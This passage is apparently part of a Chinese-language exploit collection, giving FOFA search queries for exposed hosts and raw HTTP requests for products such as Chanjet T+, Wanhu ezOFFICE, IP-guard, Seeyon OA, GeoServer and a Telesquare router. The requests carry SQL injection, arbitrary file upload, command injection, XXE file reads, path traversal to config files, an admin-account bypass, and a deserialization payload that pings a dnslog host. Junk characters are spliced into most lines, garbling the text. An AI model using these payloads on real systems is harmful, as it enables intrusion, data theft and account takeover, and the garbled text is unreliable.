/ T: @8 H& W- s8 P' XHost: x.x.x.x
3 P" o9 E+ v- l% o. i- j% pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.365 u/ o$ e4 r H, V) Q
Content-Type: application/json
- O' K! x( L5 D+ g. W
% b$ s0 P% J' z; j, ]/ R{
9 l' [: b4 i: N! J0 p$ T "storeID":{6 O+ l' N; E! m) ]% g: r: M8 I
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",1 ~* p$ X2 V4 k* u# F7 R1 m
"MethodName":"Start",$ q" p. `0 m5 i8 v/ w% ^
"ObjectInstance":{
; w0 j2 T, r% o* T ~ "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",! {- @# C' z/ n3 w, T4 U- P- f+ E% h
"StartInfo": {( Y7 n( A: L, Y4 O7 c! s; G V: G0 R
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",. @# P& X8 {: S% E3 C
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
+ |: C. }# f9 U! ]% l- o, C `; ] }- f2 l% J$ S' r# p9 a V1 q8 V* N a
}
0 t" [% o3 i, R/ Q: Z }# K3 D$ h+ P5 ~( E- m3 C
}
0 [1 |7 r7 X2 m/ J( G& D/ Q! r" u* {; G" h, C5 u" D; W
! E1 X" I/ }2 S1 b& k9 I57. 畅捷通T+ keyEdit.aspx SQL注入3 @( z$ J- V( R2 \. ^+ m
FOFA:app="畅捷通-TPlus"6 `9 A+ {( S; ` _$ y# Z
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1' f0 E( O6 k8 Z& G/ e3 k( v! ?
Host: host
3 w* `: k* U- U4 ^* Q" xUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
$ U: y& g' c* }Accept-Charset: utf-8
; H8 b8 H+ Q3 e) PAccept-Encoding: gzip, deflate' _% P6 Y* C4 O* v; @6 P
Connection: close7 [6 ^" j- W+ A8 Q$ v
, k" ^- t9 R' x8 {% q- g8 F1 r" `) J8 W/ \& O/ q K
58. 畅捷通T+ KeyInfoList.aspx sql注入+ K, A. Y6 g, M
FOFA:app="畅捷通-TPlus"8 E+ x( c9 o5 [
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.18 R. f: @# `6 ~% B
Host: your-ip/ B! l* G9 n+ U$ g2 D( Q$ m6 k; i
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. u: M4 d5 F* L2 }! d
Accept-Charset: utf-8
5 L0 E F: ?, l! d" d" g4 p8 hAccept-Encoding: gzip, deflate3 q7 T; e- \& Y% n1 `# U+ U; U
Connection: close' G1 R+ Z9 A# h" R7 r
4 G. [- p( Z$ r
% _; v b. d3 V1 j b
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行; d2 L( k& B- I
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"- ~5 g5 ?7 h5 g* r' p$ V
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 c' B; y$ [$ r% x2 N4 P5 @7 O
Host: 192.168.86.128:9090
" j9 t$ T3 t; x" u- ?7 [User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.360 V2 Q3 H& t6 c' ?; `- ^" `. N2 T' k" Z
Connection: close
/ U U; N* W$ `. N* @* E. BContent-Length: 16690 C2 {( ?& B& @
Accept: */*5 _* B# V1 @& g( [* e" t, X
Accept-Language: en
6 N2 `1 ~- o+ I/ y+ A# t, F& TContent-Type: application/x-www-form-urlencoded
. u, E/ y2 K% VAccept-Encoding: gzip$ B8 E2 e" v- ^
* F: L# S% N9 T6 G/ R
PAYLOAD
4 ?. D( s* w, A- g
6 u+ y* J0 J. }1 M3 T. T8 G. P* R6 _% B5 U
60. 百卓Smart管理平台 importexport.php SQL注入
# `: _0 V! c. G$ |1 Z! s7 ~& G2 Z' MFOFA:title="Smart管理平台". e6 b7 {0 z: K7 o
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
* m+ _# r, b4 [6 |Host:% L+ s$ a) h0 k# w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 M0 Q3 S' C3 ~7 z1 r( m0 u# z, A( _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ u" T7 T$ Y9 P& }) \' q% a! J- oAccept-Encoding: gzip, deflate
$ k# M4 k4 h. `' B! E y- |5 oAccept-Language: zh-CN,zh;q=0.9
- b3 `: ~. n4 n5 g2 K7 [Connection: close
5 v1 p, z5 Y* e1 J+ A& q
6 {1 ^' Z3 E: s/ _) h3 h" u) W$ q O$ L3 q0 X4 k P( w
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传/ X8 a$ D5 Q, V) n% s( c
FOFA: title="欢迎使用浙大恩特客户资源管理系统"" ?, g# ?3 S7 A# X$ J' X# J
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
/ }- p7 V3 O, s& qHost: x.x.x.x
Y# J3 k a" M! Y' S6 r7 c( wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* R, g. b2 t1 z6 R* D/ JConnection: close2 Q% k3 v& A) i8 _, `( I
Content-Length: 27
Q M) Z9 |* Z0 H" ^ Y1 RAccept: */*
! W9 ]8 K9 i! G# _1 x9 }6 NAccept-Encoding: gzip, deflate5 t6 Y. l# a9 r3 n) M! @2 E' ~
Accept-Language: en* v7 H2 q0 o6 |1 ?2 s* N3 ^) M
Content-Type: application/x-www-form-urlencoded
+ V8 m, e1 e0 M" G/ p" ?
5 i; y3 H3 f; m u8uxssX66eqrqtKObcVa0kid98xa0 M& ^ f# J7 N V( y
; l' d e5 F' i: _$ |/ l
0 O8 q0 T+ s7 i% }: y6 k. s* }, l
62. IP-guard WebServer 远程命令执行0 P; @9 P7 r5 c8 I8 j+ I. t
FOFA:"IP-guard" && icon_hash="2030860561"1 F& C5 l; P0 U/ U2 C7 D; f& w. v
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1+ b% ]/ C8 |3 i
Host: x.x.x.x
8 F0 a1 e( M l5 `5 ?# i9 bUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36. t+ B1 B9 v* }! r1 l
Connection: close
" V }2 D, D* ^' IAccept: */*0 |) n! W" L6 @5 E% ~: x9 M/ j
Accept-Language: en( ?' Y9 i8 F1 ] @6 w
Accept-Encoding: gzip
, G; {3 q- D( c. x. ?# y0 t
+ z8 ~% P+ D0 P* n( A' _4 x) J& j
( b; M) o" a6 A! U访问
0 H& B4 _) v0 `7 {5 @% G0 R" ^* G) i; j
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1# k6 N) V) M. P
Host: x.x.x.x; a, j, ?0 k$ d0 v9 t+ o4 p
4 e. P' ~" Q8 Z
! J& |% j; ~( ~
63. IP-guard WebServer任意文件读取# l6 n6 I3 L* H8 M
IP-guard < 4.82.0609.0
. K% S* N8 I4 e: i5 NFOFA:icon_hash="2030860561"
) G- B5 N7 U) nPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1, v c- F2 T& t. z. V1 d
Host: your-ip! b, T3 g: e P) {/ N, T8 M$ {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 D1 E" s5 |- O' YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 d( g. f) j" `9 T: B7 O, U9 rAccept-Encoding: gzip, deflate" U( H$ @0 i8 w% ^$ f# h0 m
Accept-Language: zh-CN,zh;q=0.98 C( @" p! D# Z9 _
Connection: close
6 k7 S2 c' P" I! `" h: `Content-Type: application/x-www-form-urlencoded
2 b" [1 W* A8 K) v2 O2 f
$ Y8 D2 o+ S6 S& |& `path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
$ F$ I2 s3 \" m$ z! S8 ]1 D5 d& K" P) `' ^) v& i) H3 V4 L& {( p
64. 捷诚管理信息系统CWSFinanceCommon SQL注入7 m. u1 Q. r1 h# a: C
FOFA:body="/Scripts/EnjoyMsg.js"
% T+ r+ ?( c; T2 h. O( zPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1; C- s! `+ Q- k7 S
Host: 192.168.86.128:9001
6 D, B4 T9 U2 x, d: rUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
/ Z2 y: I- r8 C v' WConnection: close" a6 x4 U. Y' M q3 ]
Content-Length: 369
; E: O' C* a: G7 lAccept: */*. w2 \. b6 ^: a! ^0 V" K& o
Accept-Language: en
# P A% p1 i% j: H& w# V. dContent-Type: text/xml; charset=utf-8
# Q4 p/ D* u$ I' DAccept-Encoding: gzip$ K/ k3 r1 p, H. u0 D# Q- u% c* n
3 D8 o* Y* h0 j0 p9 {% u. a( ^' Z<?xml version="1.0" encoding="utf-8"?>
3 [: Q% Y% q& F! K<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> R. p% z+ f# V( a M* i9 q
<soap:Body>
, C/ j" d. S; h) K1 ?5 P, g* `! ] <GetOSpById xmlns="http://tempuri.org/">1 z( a3 ]3 B& ?8 K6 V- K6 k
<sId>1';waitfor delay '0:0:5'--+</sId> R$ K) l! l) [$ x
</GetOSpById>
( B' V+ w5 Z" @; X* J Z3 l </soap:Body>6 i+ U3 p( |' c. w: g
</soap:Envelope>! x6 A, z8 ?5 \; P6 C% p
9 j4 `* }( u- f- n( {3 Y
' O" p$ ~: L x, h" E
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
/ Z4 ~0 S4 m' Y0 t3 u! }+ aFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"" M/ @, E- E* M
响应200即成功创建账号test123456/123456
* z$ L/ D3 ~! k, h5 x- Z2 D( nPOST /SystemMng.ashx HTTP/1.1" d5 v. B8 o T9 D# v
Host:; M1 v$ W( T6 ^5 c; `; u$ B; J
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
~9 q9 H* Q( zAccept-Encoding: gzip, deflate& {6 R8 P- P r4 \' r) l
Accept: */*
6 }# z; k5 [. p' m- LConnection: close/ g2 n6 V7 B. N0 _0 O# z* }9 L) m
Accept-Language: en
8 K0 S0 B% u W& P: S* a7 CContent-Length: 174
2 \8 v" n& }8 v0 R; P A* w+ w- z9 k2 m! p& e9 ~; P
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
9 U, Q) {/ I4 ^9 v1 e1 A
0 G; W, v5 F; A) V
5 d+ v. j, X8 v66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入, o# _3 g! d* y! J- w) ~
FOFA:app="万户ezOFFICE协同管理平台"
3 J) t) I j- Y, }4 W2 c$ U" o/ W% v4 R% C6 x
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
3 H. |5 I0 i% J3 f; c1 N' q zHost: x.x.x.x a* q3 M3 }) O; F% a; u5 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36! I7 j) c$ u4 { E6 N
Connection: close
2 [3 ^* H* j2 O9 fAccept: */*% Y( M& o; |3 W. o2 Q3 a1 c
Accept-Language: en
. o! X7 [2 N# W0 FAccept-Encoding: gzip
+ q( _, T' p' G+ j7 z9 I/ X5 o
/ J9 @9 @6 y5 f# S9 v# \: a/ g# t# h5 o& S( A/ E/ H
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在- z! a5 E4 U2 I8 F
5 p! e; ~/ o, a% D$ X1 Y67. 万户ezOFFICE wpsservlet任意文件上传) y3 k; v3 x$ M5 |
FOFA:app="万户网络-ezOFFICE"
& W# {$ j# R) R/ jnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
8 N0 O! l) n8 t8 x: ~( ^! UPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1; w" i3 _3 b6 L
Host: x.x.x.x
6 [9 }1 G% x0 ]* RUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0# c: `" I2 s; P$ j& ]
Content-Length: 1735 d4 X0 j" m. u4 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.80 ~/ M" g! j7 R3 A$ M% h4 s
Accept-Encoding: gzip, deflate
. m/ B9 R3 ~1 ~: H$ H$ x! I- SAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3: F7 `( q( P. I Y
Connection: close5 v' q% W' X7 g3 t
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp$ E5 T/ I3 D0 Z# [' ~* i" R
DNT: 1* ?# z" I5 o4 g0 D2 H& ?3 m* f* ~
Upgrade-Insecure-Requests: 1' ], n! j! F4 `# ?, u
! ~9 m" \+ D: U- C9 Y) u--ufuadpxathqvxfqnuyuqaozvseiueerp
" a# K- }7 C5 C/ zContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
: b0 L* g4 x( {3 [5 m5 i9 o6 l5 ?- h6 q6 I p- i
<% out.print("sasdfghjkj");%>- w2 h; N4 Z8 ]* L+ a
--ufuadpxathqvxfqnuyuqaozvseiueerp--
5 G$ E _, k# ]; i6 C+ o9 ~! ^
! v5 k0 w/ M6 q/ l! ~ Y' w
- K" ]6 j, G! V# H, C; ^文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
1 \ u' _; Z" j2 S8 `$ m% j1 k( K) O* X8 r& b9 T3 r( Z6 |
68. 万户ezOFFICE wf_printnum.jsp SQL注入2 v$ x: a& H0 c; ^$ ~8 Z6 H4 u
FOFA:app="万户ezOFFICE协同管理平台"
% _1 `2 E6 q4 dGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
5 v( L' B9 ~6 l% Q Y& C$ M4 |& UHost: {{host}}
$ H" D# w# o' ?) GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36" ^; D* e1 ?1 k0 d! M- w
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8% W" [4 l; `; r5 T- \7 f
Accept-Encoding: gzip, deflate
. i: Y; f# h5 }$ z* zAccept-Language: zh-CN,zh;q=0.9
( j. D. R5 X2 |, r2 M# sConnection: close/ g) ^9 `8 O, G& M2 b' ]
3 @: m3 R% t/ {9 T% z
9 n0 f' @1 x8 s9 o9 S* Z69. 万户 ezOFFICE contract_gd.jsp SQL注入+ X( ^5 o! q# X/ c- S
FOFA:app="万户ezOFFICE协同管理平台": r# l$ e! |% m4 i) e# G
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
6 h* N' ]3 P- \- b' J0 O pHost: your-ip
" e3 [4 P, Q$ P/ C( `$ zUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, j* \* L- k7 ]7 {8 G5 C( aAccept-Encoding: gzip, deflate
" R. J( B' M* `6 hAccept: */*
% M& A( d; k3 ^: CConnection: keep-alive
# q3 ?3 X' [0 q' _- E; z. f
8 x+ Y8 @6 i% y4 |) [
1 h0 _$ Z/ ?8 k' H! a- h70. 万户ezEIP success 命令执行+ [+ ]3 v8 O3 j+ W% _0 L( I& C( \. a
FOFA:app="万户网络-ezEIP"" H0 S0 B- T# n6 D
POST /member/success.aspx HTTP/1.1
+ C% O+ R1 ]8 E7 J6 ~Host: {{Hostname}}
% @* P* K1 H8 {5 D7 e `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
- M, h9 F9 g% a# I: oSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
- Q/ {. }) z9 H! F& |" H Z! G; nContent-Type: application/x-www-form-urlencoded' L1 ^* g3 a+ U
TYPE: C) J! b& K: @) D& y
Content-Length: 16702
9 [) j( z' `* e* ]9 @. G. \" J3 C' y. o* B6 A. m0 [4 m' p% u
__VIEWSTATE=PAYLOAD. m0 w# t" q0 V+ l
# J+ Z9 V& E( ]" V% X/ Y! h
' ^ j- A) l/ s0 z
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
2 l2 U9 t3 |; L0 L3 \/ H9 [FOFA:body="PM2项目管理系统BS版增强工具.zip"5 n4 r1 N; T, L/ A( I: D
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1 J1 a$ \; D8 t6 ^7 |3 e X, J; S
Host: x.x.x.xx.x.x.x/ T7 z* a! o) ^: i- Z
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* L {; N. g* ^1 [( VConnection: close
# Q2 ?: h0 W$ z, xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* ~- _( K" L4 r" E
Accept-Encoding: gzip, deflate
6 a0 Q, G" X& [ U: g: PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 n( _7 _+ e0 ?9 Q
Upgrade-Insecure-Requests: 1
/ |4 m; M2 C, s
+ \" S, |# _1 @0 | c+ Y ?2 x0 O; I8 ~7 {6 g8 d* s3 }5 O
72. 致远OA getAjaxDataServlet XXE
5 ~5 `2 v! q3 ^/ ZFOFA:app="致远互联-OA"" x# P( y; F' f) W
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
: l( z) b7 _/ o: uHost: 192.168.40.131:8099
) }0 S' P- w5 j& P1 {User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
" `4 S$ l. ~' e2 A+ B' bConnection: close j. y6 s V6 j
Content-Length: 583% W9 j& X9 a5 k) i! _4 w
Content-Type: application/x-www-form-urlencoded. w3 D% V8 k: n; Q; j
Accept-Encoding: gzip
# ?% z5 s. [8 w! D, `, U/ Y; j
& k4 ^+ [3 W/ |$ v- J4 qS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E/ J, {; d, A! [. {+ g
' Q0 n8 T9 V6 v3 ?
1 T# ?) ?5 o! z, L U" G73. GeoServer wms远程代码执行
5 {* @2 t5 E" f3 }" A3 T# [FOFA:icon_hash=”97540678”' Y0 o0 p9 M/ F( O; d- l
POST /geoserver/wms HTTP/1.1
' L8 F6 R) g& _, wHost:+ {1 ~; @# d$ s- r3 M3 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
- j! H: B! D* l; Y( y2 d' o$ l. sContent-Length: 1981$ }7 E3 M7 x) [# I( Y
Accept-Encoding: gzip, deflate
9 w7 i8 c0 F6 z( W6 t: LConnection: close6 ^ f) w- b$ }2 a/ d) o
Content-Type: application/xml# }2 Z N! g. Z& Z1 V
SL-CE-SUID: 32 s |' g) k$ X W4 p1 ?
$ V A. g" x. k w
PAYLOAD/ j0 g! x# s2 V; w M. Q
9 _; {/ V9 ~4 {; D. ~
f; k2 i; l( T9 Q y- N( I9 H74. 致远M3-server 6_1sp1 反序列化RCE
" j3 w" W( ?3 v# ^ V7 {FOFA:title="M3-Server"/ F. P/ n( x7 Y: s$ J
PAYLOAD
, }9 N+ F# E W& k$ F) R4 d5 a* k1 A- j( H, `
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE4 ?$ t5 M4 ?* M, a
FOFA:app="TELESQUARE-TLR-2005KSH"0 [9 H% t1 _3 s4 G" h. r
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1* H) N3 ?$ z# E4 e) b* W
Host: x.x.x.x6 P! {/ f& e5 o* Z8 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& [8 x3 `9 V% U6 W
Connection: close
9 @3 _& }. m F4 oAccept: */*
) N9 ^! L c# K) h' b, U# }Accept-Language: en
3 L7 N( M" }5 Q3 ?6 lAccept-Encoding: gzip, D" x- P j% L4 E" R
3 K0 O6 d d2 Y& }% |
( ^# B/ ?$ h) G% L/ Q0 T
GET /cgi-bin/test28256.txt HTTP/1.1
' I) l# }$ |) u& T) G- {, Q _- zHost: x.x.x.x! ?1 m5 ]6 q/ z, H
, O7 B/ \9 K& t0 j* K, ^+ ?; w3 {
( X* y$ F4 r6 F u2 g7 T1 f76. 新开普掌上校园服务管理平台service.action远程命令执行
2 b3 ^0 c3 Q4 \/ h8 e# [" mFOFA:title="掌上校园服务管理平台"0 X, x& D* o& N7 H
POST /service_transport/service.action HTTP/1.11 l1 H+ T/ X9 a: F& R! L/ a8 ^6 }
Host: x.x.x.x
+ D7 q5 \& `4 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.09 c, X; B5 k% o8 g0 Z6 m; b4 p& r: ]4 B- u
Connection: close9 I1 p- v9 b6 h3 ^0 {8 D
Content-Length: 211- m, K2 v3 D8 @3 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
L( ~' B( n& m1 A( M/ |Accept-Encoding: gzip, deflate
9 e2 b; \' O1 C& G4 p% o) dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ i% W& e2 K) |
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Y) \9 X% m* n. ?Upgrade-Insecure-Requests: 1
+ D! h- ^+ n5 x) ?
9 X( e, w) d. q0 [5 Z/ k; a{ e4 P O3 o' T! Q+ y
"command": "GetFZinfo",
- X$ W. U1 m& N "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
8 Q3 d# ^2 A a' ?' z+ c/ T+ S ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
" X) ]2 M! B: \. ^" o, G" B}
; P' L- g: s. J; q8 d7 p
! `* |1 _" M3 o# S0 |3 x- ?. k2 A8 v7 s) X( }/ `0 k
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.14 I I+ x# D/ d4 e$ V
Host: x.x.x.x2 }" l7 y0 |: _
" |. V9 j" p [# y% K: t
}( z5 `# P3 \* Z0 f+ [% t l
/ d) I& d) p% {$ o9 M7 M77. F22服装管理软件系统UploadHandler.ashx任意文件上传 F9 @/ c: c& C
FOFA:body="F22WEB登陆"
3 K0 |7 N: [' [6 m. d* Y) V* X' HPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
6 t6 m9 H8 A t7 ^( eHost: x.x.x.x
7 I1 m& t8 }+ w) G# ]$ B* YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.364 z. e$ ? U3 [+ n0 s
Connection: close
8 f( }+ ]2 P2 u! AContent-Length: 4338 _+ L' b9 B; c o( R- }
Accept: */*
. o' {' y6 q: J. f6 p8 sAccept-Encoding: gzip, deflate& V% T: T8 A: D6 y& c
Accept-Language: zh-CN,zh;q=0.96 v7 e0 ~9 X, i4 }
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix0 O3 `7 O* v" _' S$ c \
( c. T/ h% r4 H% i6 p8 K
------------398jnjVTTlDVXHlE7yYnfwBoix
2 Q& t1 f8 }( p% HContent-Disposition: form-data; name="folder"
' {2 v* H G( \1 i$ Y/ A: y
4 w1 o" B( |* k; Q& _' F/upload/udplog7 \. F: Z; \/ d8 A0 F
------------398jnjVTTlDVXHlE7yYnfwBoix" Q$ K. L# f3 I8 N2 T/ O2 E2 q
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
0 H* }! P' z2 r& i" eContent-Type: application/octet-stream; ]; J& M0 H8 V0 U" ?+ W
: w+ r' `- B- W* j+ k. P; K; P
hello1234567
( ]. _# q1 @! w9 s------------398jnjVTTlDVXHlE7yYnfwBoix
2 |# b5 q, C. v8 @. q$ }Content-Disposition: form-data; name="Upload"8 Q: k ?; p D" @
5 r& O: N. U* e; Y* YSubmit Query
B: Z+ ]( h" K2 j------------398jnjVTTlDVXHlE7yYnfwBoix--
. K( G8 P* j: {' F
4 q* u3 m/ G# L$ f4 R& Q8 g* o7 {7 [) z' N
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传- f1 U# M( b" n7 ~' Q
FOFA:icon_hash="2001627082"
7 A7 q7 m! B1 o8 ?4 ~5 |+ ^POST /Platform/System/FileUpload.ashx HTTP/1.1/ ]! ?0 i4 Q A6 r7 j3 A, H
Host: x.x.x.x
6 `! X' w( b2 s; s2 U2 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 r! i- N# K- P4 c4 v3 w4 l8 ^Connection: close
7 k2 o4 y# v: ?5 H4 V2 nContent-Length: 336" @. t- T) W6 I6 _* e: |1 L. k6 [
Accept-Encoding: gzip
' P+ X4 j0 K$ ^! E8 S3 [1 H) SContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
$ f; T* b# @% |1 s/ O; \; S/ e; ?. S
; p. P5 B. Y: H: f------YsOxWxSvj1KyZow1PTsh98fdu6l2 {, _' l3 W2 d& j- |
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"9 _& H" \+ [ Y1 u" ]; G' U; K
Content-Type: image/png# i+ k4 Z3 I4 h9 h
- r3 `, O( h5 Z* C7 b7 w
YsOxWxSvj1KyZow1PTsh98fdu6l$ H$ x9 m1 O2 ?% |
------YsOxWxSvj1KyZow1PTsh98fdu6l7 v# d8 C. l- H% S, z( i$ r* `
